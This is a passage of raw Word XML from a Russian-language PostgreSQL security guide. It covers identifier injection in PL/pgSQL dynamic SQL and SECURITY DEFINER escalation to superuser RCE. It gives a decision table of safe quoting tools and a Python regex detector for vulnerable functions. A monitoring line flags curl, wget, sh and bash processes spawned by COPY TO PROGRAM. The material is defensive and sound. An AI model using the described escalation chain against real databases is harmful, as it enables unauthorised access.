        <w:t xml:space="preserve"> — SD-функции без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SET search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (3.13.6 риск).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 + `pg_authid` cross-check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: новые SUPERUSER-роли, созданные в окне после EXECUTE SD-функции от non-DBA caller.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`pg_event_trigger`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: triggers, созданные в окне после EXECUTE SD-функции.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OS-monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: процессы под postgres-user (curl, wget, sh, bash) от COPY TO PROGRAM.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Logs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mod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log_statement = ddl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для всех SD-функций.</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SECURITY DEFINER — все версии PG. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PG 17 mitigation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pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> role + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MAINTAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilege снижает использование SECURITY DEFINER для maintenance tasks. Никакие фиксы не закрывают 3.16.5 — это application-level плюс design-feature.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3.16.1 format %s vs %I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — single source of identifier-injection (R18 base).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3.16.2 quote_ident</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — alternative для same protection.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3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — для значений; обязательный complement к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3.16.4 || конкатенация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — самый частый source 3.16.5 в реальных функциях.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parallel class уязвимостей в SD-функциях (hijack без injection). Граница: 3.13.6 — name resolution; 3.16.5 — SQL text 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 (other privilege escalation patterns)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст privilege escalation.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 PROGRAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Variant B finale.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3.7.2/3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — alternative RCE paths.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owner SD-функций должен иметь minimum required privileges, не automatic superuser.</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«CREATE FUNCTION» /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 https://www.postgresql.org/docs/current/sql-createfunction.html#SQL-CREATEFUNCTION-SECURITY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«Writing SECURITY DEFINER Functions Safely» — https://www.postgresql.org/docs/current/sql-createfunction.html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«Predefined Roles» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_maintain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/predefined-roles.html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17 Release Notes (pg_maintain introduction) — https://www.postgresql.org/docs/release/17.0/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2ndQuadrant blog: «SECURITY DEFINER pitfalls» — https://www.2ndquadrant.com/en/blog/security-definer/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Wiki: «Security» / SECURITY DEFINER best practices — https://wiki.postgresql.org/wiki/Security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R18 (sources/research.md, строки 274–291)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Саммари: категория 3.16 Identifier injection в plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Категория 3.16 покрывает identifier-injection в серверном коде на PL/pgSQL — класс уязвимостей в dynamic SQL, где user-controlled identifier (имя таблицы, колонки, схемы) попадает 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без правильного quoting. R18 — основной research-anchor; все пять подразделов разбирают разные грани одной системной проблемы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL Wire Protocol bind-параметры не работают для identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">должен явно вызвать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format('%I',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USING — иначе любая identifier-position становится injection-точкой.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Главный тезис категории: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">identifier и value требуют разных защитных инструментов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Identifier —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Value — USING (предпочтительно) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">%L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Конкатенация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без сопровождающих защитных вызовов — антипаттерн на всех позициях. SECURITY DEFINER усиливает любую identifier-injection до privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Подразделы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3.16.1 format %s vs %I (R18)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — основная карточка. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">format('%s', tbl_name)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> подставляет identifier без quoting → stacked-injection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EXECUTE. Защита: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(identifier-quoting с doubling double-quotes).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3.16.2 quote_ident ограничения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функциональный эквивалент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но: (1) не для значений, (2) не нормализует case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(3) пропускает Unicode homoglyphs. Защита: ASCII-only regex + точный whitelist без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">lower()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">/normalize.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3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — безопасный bind для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значений</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через extended protocol. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не работает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для identifier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валиден только в expression-position). Защита: комбинировать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для имён + USING для значений.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3.16.4 || конкатенация — антипаттерн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — самый распространённый source 3.16. Полный пример с 5 injection-точками в одной функции: schema-injection, identifier-injection, value-injection через quote-escape, ORDER BY-injection. Защита: систематический переход на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USING + whitelist.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 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — каскад трёх ошибок: SECURITY DEFINER переключает context на owner; dynamic SQL внутри унаследует privilege; identifier-injection даёт arbitrary SQL под owner. Эскалация до superuser-RCE из обычной EXECUTE-привилегии.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Decision-таблица: что использовать когда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Цель защиты</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Правильный инструмент</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Антипаттерн</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Имя таблицы / схемы / колонки</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 x)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> или </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">quote_ident(x)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format('%s', x)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">, `</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Значение для WHERE/INSERT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EXECUTE ... USING $1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Schema-qualified имя</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format('%I.%I', sch, tbl)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (split!)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 'sch.tbl')</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (одно имя)</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3.16.1</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Часть DDL (CREATE/ALTER)</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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + whitelist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concat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3.16.1, 3.16.4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Direction для ORDER BY</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whitelist </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">('ASC', 'DESC')</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 после check</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concat без whitelist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3.16.4 (+ 3.14)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SECURITY DEFINER функция</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всё выше + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SET search_path = pg_catalog, pg_temp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SD без search_path и/или с</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tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Хук для rules.py: класс IDENTIFIER_INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># rules.py фрагмент — детекция identifier injection в plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Применяется к extracted prosrc из pg_proc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import re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IDENTIFIER_INJECTION_PATTERNS = [</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 3.16.1: %s в position, похожей на identifier</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"format\s*\([^)]*%s[^)]*(tbl|table|col|column|schema|relname)",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">               re.IGNORECASE),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3.16.4: EXECUTE с || (без сопровождающего format/quote_ident)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"EXECUTE\s+['\"][^'\"]*['\"]?\s*\|\|", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"\|\|\s*[a-z_][a-z0-9_]*\s*\|\|", re.IGNORECASE),  # var посреди concat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3.16.4: || c quote vs без quote — нужен AST-walk или окруж-анализ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (статически выявляется через отсутствие quote_ident/quote_literal/format в окрестности)</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3.16.2: lower() перед quote_ident (case-fold bypass)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"lower\s*\([^)]+\)[^)]*&lt;&gt;\s*ALL", re.IGNORECASE),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.compile(r"lower\s*\([^)]+\)[^)]*=\s*ANY", re.IGNORECASE),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3.16.5: SECURITY DEFINER + EXECUTE без %I</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # (требует pg_proc.prosecdef = true cross-check)</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pg_proc-уровневые queries для runtime-аудита</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IDENTIFIER_INJECTION_PROC_AUDITS = [</w:t>
